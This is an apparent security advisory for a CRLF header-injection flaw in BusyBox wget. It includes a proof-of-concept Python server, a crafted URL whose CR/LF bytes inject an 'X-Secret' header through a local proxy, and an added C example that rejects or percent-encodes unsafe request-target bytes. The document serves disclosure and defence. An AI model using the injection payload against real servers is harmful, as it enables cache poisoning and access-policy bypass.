Product: BusyBox (wget)
Affected: through 1.37.0
File: networking/wget.c
CWE: 113
Summary: If the request-target (path/query) contains raw CR/LF/C0 or a raw space (0x20), the HTTP request line can be split and attacker-chosen headers injected, enabling cache poisoning / policy bypass.
Vector: A user or automated job fetches a crafted URL that includes CR/LF in the path/query (e.g., via link or redirect).
Mitigation: Reject CR/LF/C0 and raw 0x20 in the request-target; callers should percent-encode (%0D, %0A, %20).
PoC server (poc.py):
    from http.server import BaseHTTPRequestHandler, HTTPServer

    class H(BaseHTTPRequestHandler):
        def do_GET(self):
            # Dump every header the client sent, then gate on the injected one.
            need = "X-Secret"
            print(self.headers)
            if self.headers.get(need) == "yes":
                self.send_response(200); self.end_headers(); self.wfile.write(b"OK\n")
            else:
                self.send_response(403); self.end_headers(); self.wfile.write(b"NO\n")

    HTTPServer(("127.0.0.1", 9000), H).serve_forever()

$ python3 poc.py
$ unset http_proxy
$ export http_proxy=http://127.0.0.1:9000
$ BAD_URL=$'http://evil.example/reset?token= HTTP/1.1\r\nX-Secret: yes\r\na:'
$ ./busybox wget "$BAD_URL" -O -
Observed (server side):
X-Secret: yes
a: HTTP/1.1
Host: evil.example
User-Agent: Wget
Connection: close
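The check the Mitigation line calls for, written as an added example in C (this is not BusyBox's own code from networking/wget.c): request_target_is_safe rejects any request-target containing CR, LF, another C0 control, DEL or a raw space before it reaches the request line, build_request_line refuses to emit a line for such a target, and percent_encode_target is the caller-side encoding the advisory recommends. The function names, and the choice to also encode DEL and non-ASCII bytes, are assumptions of this example rather than anything the advisory specifies.

```c
/* Added example, not BusyBox code. Assumes the caller has already split the
 * URL into its path+query part (the request-target). */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Returns true if every byte of the request-target is safe to place on the
 * request line: no CR/LF, no other C0 control (0x00-0x1F), no DEL (0x7F),
 * and no raw space (0x20), which would terminate the target early. */
bool request_target_is_safe(const char *target)
{
    for (const unsigned char *p = (const unsigned char *)target; *p; p++) {
        if (*p < 0x21 || *p == 0x7F)
            return false;
    }
    return true;
}

/* Returns a newly malloc'd copy of target with every unsafe byte (C0
 * controls, space, DEL, and non-ASCII; the last two are this example's
 * assumption) replaced by %XX. Other bytes, including an existing '%', are
 * copied unchanged (the caller is assumed to have produced valid escapes
 * already). Returns NULL on allocation failure. */
char *percent_encode_target(const char *target)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t len = strlen(target);
    char *out = malloc(len * 3 + 1);  /* worst case: every byte becomes %XX */
    if (!out)
        return NULL;
    char *o = out;
    for (const unsigned char *p = (const unsigned char *)target; *p; p++) {
        if (*p < 0x21 || *p >= 0x7F) {
            *o++ = '%';
            *o++ = hex[*p >> 4];
            *o++ = hex[*p & 0x0F];
        } else {
            *o++ = (char)*p;
        }
    }
    *o = '\0';
    return out;
}

/* Writes "GET <target> HTTP/1.1\r\n" into buf only when the target is safe.
 * Returns the line length, or -1 (writing nothing useful) when the target is
 * rejected or does not fit. */
int build_request_line(const char *target, char *buf, size_t bufsize)
{
    if (!request_target_is_safe(target))
        return -1;
    int n = snprintf(buf, bufsize, "GET %s HTTP/1.1\r\n", target);
    if (n < 0 || (size_t)n >= bufsize)
        return -1;
    return n;
}

int main(void)
{
    /* Constructed inputs: the advisory's injected target and a clean one. */
    const char *bad = "/reset?token= HTTP/1.1\r\nX-Secret: yes\r\na:";
    const char *good = "/reset?token=abc";
    char line[256];

    printf("bad target safe?  %d\n", request_target_is_safe(bad));
    printf("good target safe? %d\n", request_target_is_safe(good));
    if (build_request_line(bad, line, sizeof line) < 0)
        printf("bad target rejected before the request line was built\n");
    char *enc = percent_encode_target(bad);
    if (enc) {
        printf("caller-side encoding: %s\n", enc);
        free(enc);
    }
    return 0;
}
```

The reject-by-default check belongs in the client (the component that writes the request line); the encoder belongs with whoever constructs the URL. Running the encoder's output back through request_target_is_safe is a cheap way to confirm the two agree.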